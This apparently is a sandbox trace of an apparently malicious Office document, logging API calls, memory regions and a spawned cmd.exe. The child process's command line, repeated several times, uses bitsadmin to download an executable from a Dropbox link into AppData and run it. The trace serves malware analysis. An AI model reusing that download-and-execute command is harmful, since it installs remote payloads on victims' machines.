IMalloc:Free (This=0x7fefe9e5380, pv=0x79f56d0) [0236.783] IMalloc:Free (This=0x7fefe9e5380, pv=0x79f5610) [0236.783] IMalloc:Free (This=0x7fefe9e5380, pv=0x7935220) [0236.783] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd0f200) [0236.783] wcsncpy_s (in: _Destination=0x28c770, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0236.783] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0236.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x28c6a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0236.783] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0236.787] GetCurrentThreadId () returned 0x958 [0236.787] IMalloc:Free (This=0x7fefe9e5380, pv=0x7a64b50) [0236.788] SetCursor (hCursor=0x10007) returned 0x10007 [0237.015] IMalloc:Free (This=0x7fefe9e5380, pv=0x77c92f0) [0237.015] IMalloc:Free (This=0x7fefe9e5380, pv=0x78348f0) [0237.015] IMalloc:Free (This=0x7fefe9e5380, pv=0x7834710) [0237.015] IMalloc:Free (This=0x7fefe9e5380, pv=0x5674410) [0237.015] IMalloc:Free (This=0x7fefe9e5380, pv=0x77d7240) [0237.015] IMalloc:Free (This=0x7fefe9e5380, pv=0x7a35970) [0237.128] IMalloc:Free (This=0x7fefe9e5380, pv=0x7a5d7e0) [0237.128] IMalloc:Free (This=0x7fefe9e5380, pv=0x7a5cbb0) [0237.128] IMalloc:Free (This=0x7fefe9e5380, pv=0x7a5cfc0) [0237.128] IMalloc:Free (This=0x7fefe9e5380, pv=0x7a5d3d0) Thread: id = 13 os_tid = 0x9f8 Thread: id = 14 os_tid = 0x9fc Thread: id = 15 os_tid = 0xa00 Thread: id = 16 os_tid = 0xa04 Thread: id = 17 os_tid = 0xa08 Thread: id = 18 os_tid = 0xa0c Thread: id = 19 os_tid = 0xa4c Thread: id = 21 os_tid = 0xa58 Thread: id = 100 os_tid = 0x714 Thread: id = 101 os_tid = 0x93c Thread: id = 102 os_tid = 0x8f8 Thread: id = 103 os_tid = 0x124 Thread: id = 158 os_tid = 0x924 Thread: id = 199 os_tid = 0xb04 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x50177000" os_pid = "0xa50" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "cmd.exe /c \"waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 %appdata%\\iuoldw.exe &start %appdata%\\iuoldw.exe\"" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010636" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 498 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 499 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 500 start_va = 0x4ab20000 end_va = 0x4ab78fff entry_point = 0x4ab20000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 501 start_va = 0x77090000 end_va = 0x77238fff entry_point = 0x77090000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 502 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 503 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 504 start_va = 0x7feff3b0000 end_va = 0x7feff3b0fff entry_point = 0x7feff3b0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 505 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 506 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 507 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 518 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 519 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 520 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 521 start_va = 0x76f70000 end_va = 0x7708efff entry_point = 0x76f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 522 start_va = 0x7fefd320000 end_va = 0x7fefd38afff entry_point = 0x7fefd320000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 525 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 526 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 527 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 528 start_va = 0x76e70000 end_va = 0x76f69fff entry_point = 0x76e70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 529 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 530 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 531 start_va = 0x7fef5290000 end_va = 0x7fef5297fff entry_point = 0x7fef5290000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 532 start_va = 0x7fefd490000 end_va = 0x7fefd49dfff entry_point = 0x7fefd490000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 533 start_va = 0x7fefd4a0000 end_va = 0x7fefd568fff entry_point = 0x7fefd4a0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 534 start_va = 0x7fefe330000 end_va = 0x7fefe396fff entry_point = 0x7fefe330000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 535 start_va = 0x7fefef80000 end_va = 0x7feff01efff entry_point = 0x7fefef80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 536 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 537 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 538 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 539 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 540 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 541 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 542 start_va = 0x500000 end_va = 0x687fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 543 start_va = 0x690000 end_va = 0x810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 544 start_va = 0x820000 end_va = 0x1c1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 545 start_va = 0x1c20000 end_va = 0x1f62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c20000" filename = "" Region: id = 546 start_va = 0x7fefe300000 end_va = 0x7fefe32dfff entry_point = 0x7fefe300000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 547 start_va = 0x7fefebf0000 end_va = 0x7fefecf8fff entry_point = 0x7fefebf0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 548 start_va = 0x1f70000 end_va = 0x223efff entry_point = 0x1f70000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 20 os_tid = 0xa54 [0017.590] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fab0 | out: lpSystemTimeAsFileTime=0x20fab0*(dwLowDateTime=0xa3fb1aa0, dwHighDateTime=0x1d38a00)) [0017.590] GetCurrentProcessId () returned 0xa50 [0017.590] GetCurrentThreadId () returned 0xa54 [0017.590] GetTickCount () returned 0x1471d [0017.590] QueryPerformanceCounter (in: lpPerformanceCount=0x20fab8 | out: lpPerformanceCount=0x20fab8*=322150356) returned 1 [0017.592] GetModuleHandleW (lpModuleName=0x0) returned 0x4ab20000 [0017.592] __set_app_type (_Type=0x1) [0017.592] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ab47810) returned 0x0 [0017.592] __getmainargs (in: _Argc=0x4ab6a608, _Argv=0x4ab6a618, _Env=0x4ab6a610, _DoWildCard=0, _StartInfo=0x4ab4e0f4 | out: _Argc=0x4ab6a608, _Argv=0x4ab6a618, _Env=0x4ab6a610) returned 0 [0017.593] GetCurrentThreadId () returned 0xa54 [0017.593] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa54) returned 0x3c [0017.593] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f70000 [0017.593] GetProcAddress (hModule=0x76f70000, lpProcName="SetThreadUILanguage") returned 0x76f86d40 [0017.593] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0017.593] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0017.593] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fa48 | out: phkResult=0x20fa48*=0x0) returned 0x2 [0017.593] VirtualQuery (in: lpAddress=0x20fa30, lpBuffer=0x20f9b0, dwLength=0x30 | out: lpBuffer=0x20f9b0*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0017.593] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f9b0, dwLength=0x30 | out: lpBuffer=0x20f9b0*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0017.593] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f9b0, dwLength=0x30 | out: lpBuffer=0x20f9b0*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0017.593] VirtualQuery (in: lpAddress=0x114000, lpBuffer=0x20f9b0, dwLength=0x30 | out: lpBuffer=0x20f9b0*(BaseAddress=0x114000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0017.593] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f9b0, dwLength=0x30 | out: lpBuffer=0x20f9b0*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0017.593] GetConsoleOutputCP () returned 0x1b5 [0017.593] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab5bfe0 | out: lpCPInfo=0x4ab5bfe0) returned 1 [0017.593] SetConsoleCtrlHandler (HandlerRoutine=0x4ab43184, Add=1) returned 1 [0017.594] _get_osfhandle (_FileHandle=1) returned 0x7 [0017.594] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0017.594] _get_osfhandle (_FileHandle=1) returned 0x7 [0017.594] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ab4e194 | out: lpMode=0x4ab4e194) returned 1 [0017.594] _get_osfhandle (_FileHandle=1) returned 0x7 [0017.594] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0017.594] _get_osfhandle (_FileHandle=0) returned 0x3 [0017.594] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ab4e198 | out: lpMode=0x4ab4e198) returned 1 [0017.594] _get_osfhandle (_FileHandle=0) returned 0x3 [0017.594] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0017.594] GetEnvironmentStringsW () returned 0x418dd0* [0017.594] FreeEnvironmentStringsW (penv=0x418dd0) returned 1 [0017.595] GetEnvironmentStringsW () returned 0x418dd0* [0017.595] FreeEnvironmentStringsW (penv=0x418dd0) returned 1 [0017.595] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e908 | out: phkResult=0x20e908*=0x44) returned 0x0 [0017.595] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e900, lpData=0x20e920, lpcbData=0x20e904*=0x1000 | out: lpType=0x20e900*=0x0, lpData=0x20e920*=0x18, lpcbData=0x20e904*=0x1000) returned 0x2 [0017.595] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e900, lpData=0x20e920, lpcbData=0x20e904*=0x1000 | out: lpType=0x20e900*=0x4, lpData=0x20e920*=0x1, lpcbData=0x20e904*=0x4) returned 0x0 [0017.595] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e900, lpData=0x20e920, lpcbData=0x20e904*=0x1000 | out: lpType=0x20e900*=0x0, lpData=0x20e920*=0x1, lpcbData=0x20e904*=0x1000) returned 0x2 [0017.595] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e900, lpData=0x20e920, lpcbData=0x20e904*=0x1000 | out: lpType=0x20e900*=0x4, lpData=0x20e920*=0x0, lpcbData=0x20e904*=0x4) returned 0x0 [0017.595] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e900, lpData=0x20e920, lpcbData=0x20e904*=0x1000 | out: lpType=0x20e900*=0x4, lpData=0x20e920*=0x40, lpcbData=0x20e904*=0x4) returned 0x0 [0017.595] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e900, lpData=0x20e920, lpcbData=0x20e904*=0x1000 | out: lpType=0x20e900*=0x4, lpData=0x20e920*=0x40, lpcbData=0x20e904*=0x4) returned 0x0 [0017.595] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e900, lpData=0x20e920, lpcbData=0x20e904*=0x1000 | out: lpType=0x20e900*=0x0, lpData=0x20e920*=0x40, lpcbData=0x20e904*=0x1000) returned 0x2 [0017.595] RegCloseKey (hKey=0x44) returned 0x0 [0017.595] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e908 | out: phkResult=0x20e908*=0x44) returned 0x0 [0017.595] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e900, lpData=0x20e920, lpcbData=0x20e904*=0x1000 | out: lpType=0x20e900*=0x0, lpData=0x20e920*=0x40, lpcbData=0x20e904*=0x1000) returned 0x2 [0017.595] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e900, lpData=0x20e920, lpcbData=0x20e904*=0x1000 | out: lpType=0x20e900*=0x4, lpData=0x20e920*=0x1, lpcbData=0x20e904*=0x4) returned 0x0 [0017.595] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e900, lpData=0x20e920, lpcbData=0x20e904*=0x1000 | out: lpType=0x20e900*=0x0, lpData=0x20e920*=0x1, lpcbData=0x20e904*=0x1000) returned 0x2 [0017.595] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e900, lpData=0x20e920, lpcbData=0x20e904*=0x1000 | out: lpType=0x20e900*=0x4, lpData=0x20e920*=0x0, lpcbData=0x20e904*=0x4) returned 0x0 [0017.595] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e900, lpData=0x20e920, lpcbData=0x20e904*=0x1000 | out: lpType=0x20e900*=0x4, lpData=0x20e920*=0x9, lpcbData=0x20e904*=0x4) returned 0x0 [0017.595] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e900, lpData=0x20e920, lpcbData=0x20e904*=0x1000 | out: lpType=0x20e900*=0x4, lpData=0x20e920*=0x9, lpcbData=0x20e904*=0x4) returned 0x0 [0017.595] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e900, lpData=0x20e920, lpcbData=0x20e904*=0x1000 | out: lpType=0x20e900*=0x0, lpData=0x20e920*=0x9, lpcbData=0x20e904*=0x1000) returned 0x2 [0017.595] RegCloseKey (hKey=0x44) returned 0x0 [0017.595] time (in: timer=0x0 | out: timer=0x0) returned 0x5a55efa3 [0017.595] srand (_Seed=0x5a55efa3) [0017.595] GetCommandLineW () returned="cmd.exe /c \"waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 %appdata%\\iuoldw.exe &start %appdata%\\iuoldw.exe\"" [0017.595] GetCommandLineW () returned="cmd.exe /c \"waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 %appdata%\\iuoldw.exe &start %appdata%\\iuoldw.exe\"" [0017.595] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab5c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0017.595] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x418de0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0017.596] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91 [0017.596] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab4f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0017.596] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ab4f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0017.596] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0017.596] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0017.596] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0017.596] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0017.596] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0017.596] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0017.596] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0017.596] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0017.596] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0017.596] GetEnvironmentStringsW () returned 0x418ff0* [0017.596] FreeEnvironmentStringsW (penv=0x418ff0) returned 1 [0017.596] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ab4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0017.596] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ab4f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0017.596] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0017.596] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0017.596] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0017.596] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0017.596] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0017.596] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0017.596] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0017.596] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0017.596] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f710 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0017.596] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x104, lpBuffer=0x20f710, lpFilePart=0x20f6f0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x20f6f0*="Desktop") returned 0x19 [0017.596] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop")) returned 0x11 [0017.596] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f420 | out: lpFindFileData=0x20f420) returned 0x401320 [0017.596] FindClose (in: hFindFile=0x401320 | out: hFindFile=0x401320) returned 1 [0017.597] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x20f420 | out: lpFindFileData=0x20f420) returned 0x401320 [0017.597] FindClose (in: hFindFile=0x401320 | out: hFindFile=0x401320) returned 1 [0017.597] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", lpFindFileData=0x20f420 | out: lpFindFileData=0x20f420) returned 0x401320 [0017.597] FindClose (in: hFindFile=0x401320 | out: hFindFile=0x401320) returned 1 [0017.597] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop")) returned 0x11 [0017.597] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop")) returned 1 [0017.597] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\Desktop") returned 1 [0017.597] GetEnvironmentStringsW () returned 0x418ff0* [0017.597] FreeEnvironmentStringsW (penv=0x418ff0) returned 1 [0017.597] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab5c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0017.602] GetConsoleOutputCP () returned 0x1b5 [0017.602] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab5bfe0 | out: lpCPInfo=0x4ab5bfe0) returned 1 [0017.602] GetUserDefaultLCID () returned 0x409 [0017.602] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ab57b50, cchData=8 | out: lpLCData=":") returned 2 [0017.602] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f820, cchData=128 | out: lpLCData="0") returned 2 [0017.602] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f820, cchData=128 | out: lpLCData="0") returned 2 [0017.602] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f820, cchData=128 | out: lpLCData="1") returned 2 [0017.602] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ab6a740, cchData=8 | out: lpLCData="/") returned 2 [0017.602] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ab6a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0017.603] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ab6a460, cchData=32 | out: lpLCData="Tue") returned 4 [0017.603] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ab6a420, cchData=32 | out: lpLCData="Wed") returned 4 [0017.603] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ab6a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0017.603] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ab6a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0017.603] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ab6a360, cchData=32 | out: lpLCData="Sat") returned 4 [0017.603] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ab6a700, cchData=32 | out: lpLCData="Sun") returned 4 [0017.603] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ab57b40, cchData=8 | out: lpLCData=".") returned 2 [0017.603] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ab6a4e0, cchData=8 | out: lpLCData=",") returned 2 [0017.603] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0017.603] GetConsoleTitleW (in: lpConsoleTitle=0x41bbc0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0017.603] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f70000 [0017.603] GetProcAddress (hModule=0x76f70000, lpProcName="CopyFileExW") returned 0x76f823d0 [0017.603] GetProcAddress (hModule=0x76f70000, lpProcName="IsDebuggerPresent") returned 0x76f78290 [0017.603] GetProcAddress (hModule=0x76f70000, lpProcName="SetConsoleInputExeNameW") returned 0x76f817e0 [0017.604] GetEnvironmentVariableW (in: lpName="appdata", lpBuffer=0x4ab4f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x21 [0017.605] GetEnvironmentVariableW (in: lpName="appdata", lpBuffer=0x4ab4f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x21 [0017.605] _wcsicmp (_String1="waitfor", _String2=")") returned 78 [0017.605] _wcsicmp (_String1="FOR", _String2="waitfor") returned -17 [0017.605] _wcsicmp (_String1="FOR/?", _String2="waitfor") returned -17 [0017.605] _wcsicmp (_String1="IF", _String2="waitfor") returned -14 [0017.605] _wcsicmp (_String1="IF/?", _String2="waitfor") returned -14 [0017.605] _wcsicmp (_String1="REM", _String2="waitfor") returned -5 [0017.605] _wcsicmp (_String1="REM/?", _String2="waitfor") returned -5 [0017.606] _wcsicmp (_String1="bitsadmin", _String2=")") returned 57 [0017.606] _wcsicmp (_String1="FOR", _String2="bitsadmin") returned 4 [0017.606] _wcsicmp (_String1="FOR/?", _String2="bitsadmin") returned 4 [0017.606] _wcsicmp (_String1="IF", _String2="bitsadmin") returned 7 [0017.606] _wcsicmp 